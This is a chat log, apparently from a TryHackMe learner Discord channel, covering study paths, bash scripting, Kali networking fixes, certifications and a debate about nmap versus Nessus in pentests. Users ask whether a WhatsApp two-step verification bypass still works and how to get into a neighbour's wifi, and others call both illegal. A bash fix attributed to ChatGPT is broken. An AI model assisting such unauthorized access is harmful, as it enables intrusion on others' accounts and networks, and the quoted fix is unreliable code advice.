Its true that bases on some country things can be different. Anyone has some review for france?

It's feasible for those with right background, it's always evolving so some commitments to ongoing education and development is crucial

You would typically need a mix of tehnical and analytical skills and be familiar with security tools

And internships would be even more valued

It's kinda tough to get into cyberjob even if on article they said that the field needs people.

Check out this one

I can't be on intership cause i'm already work on IT Helpdesk. But i heard that helps yeah

Luky you buddy.

Hey, please don't self promote here #rules

I won the seven day streak freeze, but still my streak reset after missing one day. Will the streak freeze get credited afterwards.

Hey, please contact support@tryhackme.com :)

Hmm

Nah man, I'll pass.

Then why you complain lmao

Bro wanted to get help on discord because email support takes 2-5 business years to get back to you 🤣

Hey 👋

Could you DM me your email address so I can check your support query was received? It shouldn’t be taking that long 🙂

You should ping @icy swift about it (lemme do that for you), it's not my support query 👍

Phoenix didn’t submit a support query:) it was stated in a previous message

Oh right

I also don't have a support query though 😀

Just had to check as 2-3 years is quite long whereas I was under the impression support got back to queries in under 7 days 🙂

I just didn't want to bother the support, after all it was just 14 day streak.

@dreamy kayak @twin ridge

hi help me

With?

I am a new person, I just bought preminium and there are ready-made road maps, I don't know how to proceed when I finish the road map, I don't know how to solve which ctfs, I am very confused right now, can someone knowledgeable help me?

#start-here here's something for you to read

if you don't have a security foundation, i recommend you start by completing the pre-sec or cyber sec 101 roadmaps. they will give you the basis of cyber security concepts. the roadmaps contains practical tasks so you can experience ctfs with more guidance.

if you have a security foundation, you can go to the practice tab and sort ctfs by difficulty

Hi! I'm in Cybersecurity 101 in the cryptography lessons, and I'm trying to make a Caeser decipher script using the script knowledge from previous Linux lessons. This script gives me an error "command not found" on line 13. I'd like to add the "i" after calling the Rot function, to search for all the Rot variables I entered manually. Could you point me in the right direction for this command to call correctly?
`ciphertext=""
rot1="tr 'A-Z' 'B-ZA-B'"
rot2="tr 'A-Z' 'C-ZA-C'"

echo "What is your ciphertext?"
read ciphertext

for i in {1..25}; do
echo "$ciphertext" | $rot"$i"
done`

you can use python

that is really easy

i don't know python yet, I'm just trying to use bash script since I learned it in the previous course

`ciphertext=""
rot1="tr 'A-Z' 'B-ZA-B'"
rot2="tr 'A-Z' 'C-ZA-C'"

echo "What is your ciphertext?"
read ciphertext

for i in {1..25}; do
eval "rot_command=$rot$i"
echo "$ciphertext" | eval $rot_command
done`

CHAT GPT SAID "The error comes from how rot"$i" is being called. In your script, $rot"$i" doesn’t dynamically build the command as intended. To fix this, you can use an eval command to interpret the variable name and execute it as a command."

Oh, could you tell me what prompt you used to ask chatgpt for errors? I never used it for this

I just copied ur message

Lol makes sense

you can learn alot from GPT

It shouldn't be relied upon as a source of truth, it can confidently say things that are wrong as truth.

I mean coding or etc

knowing what is wrong with my code

My response doesn't change, it can still be wrong even with code

but you cant deny that it helps

Creating memes such as glue on pizza? Sure

You're better off learning the "old fashioned way" at this point because you won't know when it's lying to you

Until you ask stupidly stupid questions

@tawdry dove You are a senior to me so i respect your point

But mistakes happen the old fashioned way also

Best to consult multiple sources, chat gpt, text books, fourms.

for IT I have found GPT to get most of the answers correct the only thing that it struggles with in my experience is programming ( multi page programs or just slightly complex ) or any maths problem at undergraduate level.

Hi

Hello

Hey

yeah chat gpt cant do any applied calculus

I remember having to teach chat gpt more than learn from it

GPT is good if you try to learn the basics, but start doing something more complex and it is literally a rabbit hole! You will spend more time on repairing code than writing it 🤣 at least in my case

i found that gpt sometimes got the calculus questions correct mostly differentiation, but in proof questions involving a bunch of external lemmas and theroms it just shat the bucket and waffled for entire page.

Hopefully for C++ questions there will soon be a ChatGPT++ equivalent. 😉

am I the only one that have problems with kali on virtual box, randomly the network no longer work, for example I no longer can ping google

Works fine for me. Have you updated your Virtualbox recently? Also, VMware Workstation Pro is another option you can look at.

.

I actually have a seperate question about kali

how do i get rid of the scroll bars on my vm for virualbox?

Set the display to match your monitor in full screen, I feel VB is bad for that.

Hi guys, I'm trying to install install dual boot windows and ubuntu 24.04.1 but it isn't detecting windows I can only erase the whole disk then install. I did some googling and I have turned off fast startup, made 100gb free space for ubuntu and disabled the secure boot but it still isn't giving the option for dual boot. I could really use some help with it since I'm new to ubuntu.

I'd strongly recommend not mixing windows with linux

If you absolutely need both, use wsl2

If you need a hacking box, use a vm

Why not?

Adding two OS's is just adding the opportunity for errors. If you use windows more than linux i'd advise installing windows and then running Linux VM's and vice versa if you use linux more than windows.

Well thanks for your advice I'll try out the VM first then

Also windows generally doesn't seem to like dual booting

In my case, I've configured dual boot a long time ago with separate partitions for both systems and grub loader. And still succesfully using it for 3 years

I assume you didn't configure grub if you didn't mention it in your message. So if you decide to try again, try to look into it

This is correct, it doesn't like having things on the same drive at a minimum. It will overwrite your grub and or boot partitions

I'm new to it so it seemed like the best option to try it out since I saw it automatically installs grub for dual boot and you can make the partition for it when installing it but when I get to the how do you want to install it there isn't an option for windows like it doesn't even detect it just to erase the whole disk and install on it what I don't want to do without trying it out and getting more familiar with it

After connecting the software .ovpn to Kali via the configuration file using the openvpn /path command.ovpn remains enabled
2024-11-10 04:28:28 Initialization Sequence Completed
2024-11-10 04:28:28 Data Channel: cipher 'AES-256-CBC', auth 'SHA512', peer-id: 9, compression: 'stub'
2024-11-10 04:28:28 Timers: ping 5, ping-restart 120
. At the same time, if ping is enabled, it sends 4-5 packets, then stops.

If you're asking for help with the THM VPN, #site-support

I'm thinking about replacing windows 10 with ubuntu but I'm seeing this posts that it's got a lot of bugs. Is anyine using the newest version of ubuntu? If yes what has your experience with it been like?

Ubuntu probably has less annoying bugs than Windows tbf.

Depends on your system. If you have a new laptop, especially a nice one, I’d do Pop_os instead of Ubuntu. Anything else do Ubuntu

There’s a reason servers operate on Linux

You can just use a VM if you want to try it out

Aside from the majority of Windows Servers you mean.

Most*

Cloud and web hosting is mostly Linux it’s not really close

I'm talking in orgs, Windows Server dominates the OS use list.

It may not be 71% now, like it was in 2019, but it won't be too far off.

How did you reset the password?

Most of the backbone of internet runs on Linux, Also Azure runs on Linux 😂

I have never used Pop_os, but I heard good thing about it

It’s great for newer laptops, cause it automatically does the gpu kernal configuring

Little bit of bloatware, but I’ve used like 80 percent of it anyways

Fedora is stable

Fedora 41 just released too

man i bough a lenovo T440 to run specificly linux, but i don't have a use case to using it at all for now 💀. I have ipad for entertainement and my rig for gaming / HTB training.

I'm a big fan of Fedora

Hello, I am a weak person and I am still being treated for my addiction to games and pornography. Is it possible for someone to suggest some good hobbies for me to do in my life in addition to studying? Sorry for this embarrassing question, but my life is empty and I want to learn hacking so that I can protect people from the harm of pornography and games.

sorry

Welcome 🙂

https://tryhackme.com/r/path/outline/cybersecurity101

You can start here

First start with pre-security path where you will learn the networking basics, which help you to get out of pornography

Start to think how the specific thing work then you don't have a time to think about porn again 🙂

Will there be a discount on annual subscription

Probably around black Friday/December

I say probably, I'm not staff, I won't/don't know for certain

*not staff

Lol

Never give up friend! Just be sure not to trade one addiction for another.

Good catch.

I've not had any confirmation yet on my job application.

Thank you all for your support and motivation. I thought I would be neglected and no one would care about me. Thank you very much.

Gave +1 Rep to @tawny torrent (current: #2351 - 1)

Thank you all for your support and motivation. I thought I would be neglected and no one would care about me. Thank you very much.

Hello friends, I am an Arab and I want to learn English in addition to networks and hacking. Do you know a good source for learning the language from scratch? Oh, and another question: Is the Comptia course good for me to start with since it is free on the Professor Messier website? Should I start with it or not?

Oh also I am speaking from Google Translate now

CompTIA exam preparation is good. The exams are geared towards professionals (and priced accordingly), but they're apparently worth it if you're looking at getting a job in this field

You start learning language with Duolingo , it can be a great starting point 🙂 . Check out this THM resource if you're interested in Comptia Pentest+ certificate 🙂 .

https://tryhackme.com/r/path/outline/pentestplus

guys when you're all sleepy and there's apathy, how do you regain motivation

That guy seems to have a good grip on English.

I understand about a dozen languages but my speaking skills... oh boy. Should start working on that too

Rest and have other hobbies, geting yourself to exaustion does more harm than good

thank you! you're right

You need discipline not motivation bro 😄

anyone who wants to grind tryhackme with me as a friend?

hahah that's true some days too!

Hi

sure

@rustic trail i will

Deal

i already do but sure!

any golang enjoyers? i'm learning it for my job rn

anyone who has done the junior pentester path on thm? what other things should I do to complement it?

I was doing but my subscription was over

what are you doing now?

Hii everyone I want to play CTF challenge on integrity can anyone join me I need a team mate

I am waiting for december

Bug bounty

what are the prerequisites of bug bounty hunting?

After it , you can move on to red teaming pathway 😄

Nothing more just some language basic for understanding code and mechanism of website how its work

lol what about practising the stuff they teach like enumeration and stuff

You can do some CTFs to practice that 🙂

Yaa right

guys do you ever feel incredibly dumb

while doing labs

also, do you remember all the commands you ever need? I look everything up each time. My friend who works in cybersec essentially does the same

is there a way to train yourself to not forget anything

Take notes, and use them.

Yep, create your cheatsheet and use it

yeah that's a good idea 🙂

yeah thanks guys I'll do that

My Kali installation started having DNS problems. After a few minutes of use, the internet randomly stops working.

is a bug from the last update of kali or is mine

check their website, forums and kali discord server, those are the best places for that question.

Yeahhhh

@forest igloo Are you running it in a VM?

Check your dns configuration
"cat /etc/resolv.conf" may look like something this
"nameserver 8.8.8.8
nameserver 8.8.4.4" if you not you can manual change this "sudo nano /etc/resolv.conf" add dns lines into it

yes

This may be caused do the network connection in your VM settings. If the the connection settings is good then try to refer the dns configuration of your machine. If the issue didn't solved tell us we will help you

انت من فين يا أخي؟

من مصر

وانت اخي

@south inlet

@radiant jacinth and @radiant jacinth

English only please.

أسكت

OK sorry guys

مصر كمان

I sent you a friend request

tellin @south inlet to shut up is more than likely not helpfull ^^

:mute: oalotfy#0 has been muted.

Sorry on his behalf

Don't be sorry for them, I asked nicely and you stopped and spoke English.

We appreciate that.

Thanks

Gave +1 Rep to @south inlet (current: #1 - 2983)

What are the prerequisites for bug bounty hunting??

Well , you need to be familiar with web vulnerabilities 🙂

Hello, I want to ask something, I don't have a university diploma, is there any possibility of finding a job in this field other than reference by getting a certificate?

not just a certification, but experience too

Is thm enough for that?

It's a good starting point 😄

Hello, my brother. I found a doctor in information security and hacking. He says that there are jobs for experience only, but for a certain level, and after that, he will need certificates. Therefore, I tell you, learn for free, get experience, and after that, think about certificates.

Good morning, my brothers

University certification or the others?

Can you tell me the exact thm module?

Check out this 😄

This is also a channel on Discord dedicated to bug bounty

University certificates can be replaced, for example, with a compatia course, but the most important thing is certificates outside the university from companies such as network cisco, ethical hacking, etc.

Do you get me? When I get home, I will send you a hacking or cybersecurity plan, certificates, and you choose which certificates you want.

Thank you,sir.

Gave +1 Rep to @fathom jolt (current: #2357 - 1)

Sorry ,what this

hi

Hi, welcome 😄

Hi KGB is it okay if i send a friend request?

Feel free bro 😄

Alr thanks man, good to ask before i do

Gave +1 Rep to @weary meteor (current: #24 - 363)

sorry, i was really excited to talk to a friend from my country. Won't happen again.

@errant nova are you active on HTB?

which channel ??

This one 😄

This channel isn't dedicated to bug bounty, #bug-bounty is 😅

Does anyone here have experience with implementing an ISMS?
I got myself into a new, nice position as an information-security-advisor and I inherited an ISMS that my company wished to implement but forgot about for years.

So I have a 20% finished, 3000 points long checklist which needs to be reworked (cause it is REALLY out of date). Does anyone have pointers or advice? I already use government advisory documents and CIS Benchmarks, but is there anything else you would advise me to do?

Depending on the ISMS read up on which foundation it is set on. E. g. ISO 27001

They are not aiming for any certification or have any foundation - which is what makes this thing so confusing

But Thank you!

No need to certify.

here

Hi friends

Anyone know the answer for this
To whom did you escalate the event associated with the malicious IP address?

Pls help me

I tried several times using Junior Security Analyst, Security Analyst, Security operation center
All wrong

Is this TryHackMe content? If so, #room-help is the best place to receive assistance

https://medium.com/@thisispranavsv/bypassing-whatsapp-two-step-verification-1d7df1248712

Is it still working, guys

isnt it illegal

He said he reported it

He found a bug and reported.. So i think its not illegal

asking people to abuse this

I think whatsapp already fixed this

As it was reported months ago...

Don't work on my phone 🫡 , no my whatsapp privacy is safe

is there a way to connect through my whatsapp account without a phone ?

I don't think so

You have a app on desktop , but you need to login 1 time with phone

yeah i dont think you can access without your phone if you have never logged in to whatsapp web

is windows fundamentals necessary for pentesting?

Yes , they're 😄

i mean think about it companies, offices, hospitals use windows it is the "dominant OS" and the most targeted because of this reason so yeah its necessary (my opinion tho)

finished london bridge today - out of my depth with some of it, need to work on my fuzzing discipline big time, but at least i did the last bit all on my own

Maybe a question for the ones who are pentesters. What do you prefer: to use with nmap -sT or -sS? Tested the sS on my system with wireshark and it still caught the ip address so the „stealth“ option doesn’t make any sense to me or does it?

It was “stealthy” a long time ago, now its picked up by modern systems.

For pentesting, you rly wouldn’t use nmap unless there’s specific reason to do so. You would usually use a tool like Nessus which the IP is whitelisted by the client and aggregate the findings from it to find exploitable vulnerabilities.

Do you guys get the feeling where you forgot most of the stuff and even the what you have learned when you get the motivation!!

Hmm? I will strongly disagree, if Nessus is the only software used for reconnaisance/port scanning then that is not a pentest, but a vulnerability scan. You can miss a lot of vulns this way.

Nessus is a great tool, but as an addition to other means of enumeration. nmap/masscan or a similar port scanner should still be utilised if you are working on a real project

Added the Nessus Room to my to-do list.
Well my question is because i don't have "real life" experience with those tools on a real project and im just learning right now here. Until i finish the Red Teaming Path and try to get some customers to try it out in the "real world".

What could be a specific reason in your opinion?

If tou don't really have real world experience I'd suggest starting with some kind of employment or mentorship, as doing freelancing as a pentester while you are still new is not the greatest idea

I agree that you shouldn’t only use Nessus when doing pentest. I also said that you wouldn’t use nmap unless there’s a specific reason to do so. The only reason I’m bringing up Nessus (or other tools for that matter) is that they have a vulnerability database that can easily be mapped to find vulnerabilities unlike nmap and masscan in which you have to turn on different options for. They also have a UI which is easily readable, mappable, and are able to generate report/data that can be plugged in to other reports.

Pentesting is time-limited. You need to cover a lot of ground (depending on the scope) and thats why you use tools like Nessus to help make it easier.

Well, still that would not be the best methodology to recommend, especially to pentesters that are new to the industry. Nessus (or other vuln scanners) generates a lot of false positives and it can make the pentest less efficient. Most of the enumeration should still be manual, and actually in many scenarios you will not be able to utilize vuln scanners.

Yes, they do, I believe this is why I said you are to aggregate the findings and find exploitsble vulnerabilities. Manual enumeration is always good but in a pentest where it is almost always time-limited, you won’t be able to check every nook and cranny.

I agree there are scenarios where vuln scanners can’t be used but it should be in the interest of the client for vuln scanners to be used so as to make the most out of their time and budget.

But as always, it depends on the scope.

In that case the client should be informed that due to the time/budget/resource limitations, the tests will be based on automatic scanners. The sales team should work with the pentesters to avoid any miscommunication

I've worked with networks that consisted of tens/hundreds of thousands of hosts and still, the tests were not based on vuln scanners, these were just used as a point of reference and help for catching the low hanging fruit

You’re missing my point. I’m not saying automatic scanners are what you should use instead of other tools or manual enumeration.

This is exactly what I mean.

Well so what did you mean by 'For pentesting, you rly wouldn’t use nmap unless there’s specific reason to do so.'?

That's quite misleading

I’m not sure how it can be misleading. You can definitely use nmap and other tools for enumeration but my point is vuln scanners like Nessus exist for a reason. You use data from it to find exploitable vulnerabilities. This is where you mention low-hanging fruits but of course you aren’t limited to that. One example is these scanners also do port scans. Data found from that can be confirmed with nmap for example.

Can anyone help me I don't know the password to my neighbour's wifi I want to use it

@south inlet

what?

That is super illegal...

Sorry I didn't know, I just wanted to use it for study purposes

Doesn't make it legal, you can ask them?

Can anyone tell me what I can use this server for

no bro He is a very angry person

Just checked Nessus Professional and the expert option

Vulnerability scoring with CVSS v4, EPSS and VPR (for Top 10 Vulns)

Thats quite limiting on purpose in my opinion (both options have that for the Top 10 Vulns)

I will def. consider Nessus as a tool with nmap

BUT not for now because of the price.

Buy Nessus Expert
Select your license
Buy a multi-year license and save more.

1 Year - €6,343.29

Not in my budget

So it would be a good decision to write something in python to check the exploit database with what i have found with nmap to automate that part

Nessus pro is for orgs

It's used to partner the website https://www.tryhackme.com to learn ethical and legal Cyber Security.

Maybe another logical question because for this im not sure. For Example i have the permission from company X to run a test on them and they have their webhosting on company Y.

They are fine so far but for example i find a vuln on their database they use because of their webhosting service from company Y - they didnt update it.

First - should the webhosting company Y be also informed that a scan will happen?

Second - the problem is at the company Y because they didn't update their database.
The report is ofc going to company X but I should also get in touch with the webhosting company Y for that and maybe make some extra $ ?

This is all hypothetical just had that in my mind since many companies use a hosting service.

Company Y should be asked for permission first.

As it's their services and potentially their hardware etc

That's when you would request a Letter of Authority.
Basically tell company X to get written permission from company Y allowing you to test the service which they provide to company X.

hey there

how are you everyone

pretty much good night so far , you?

good evening everyone

Good evening to you too 😄

What are you up to?

Hi, I have a question. I am doing the Pre Security and I don't know if my study method is good. It is really helpful to resume the courses on a document? Because I have the feeling that I am loosing a lot of time. I am a kinda stressed when I don't know exactly something but when I spend 2 hours on a section that TryHackMe tells me will take 30 minutes, I feel like a failure. Sorry for the mistakes, I am also learning english

Hi 😄 . Don't worry about that "time" , this is more like a gimmick 😄 . Take as much time as you need , don't speedrun 😄 .

Just chilling today 🙂

hey guys...im new here....i have a question....you know those scenarios where you the examiners give you values of RGB and then you gotta answer whats gonna be the value....how do I solve those?

The time estimations THM provides are estimates, not requirements. If you want to take your time and read the prompts, take notes and really understand what you’re doing, you’re welcome to do that. You should learn how you learn best

Ok thank you for your help!

windows fundamentals are so boring anyone who feel that type of way?

That's a part of learning 😄

what if I forget the info after learning it?

You need to practice often to "burn" that into your memeory 😄

how to practice windows fundamentals?

Thm has 3 rooms on Windows Fundamentals

yes

after completing the foundation rooms, you can practice by doing CTFs on windows machines

Also try dynamic malware analysis on windows. It will help

be quiet in the libary please

https://tenor.com/view/monster-librarian-library-gif-25590673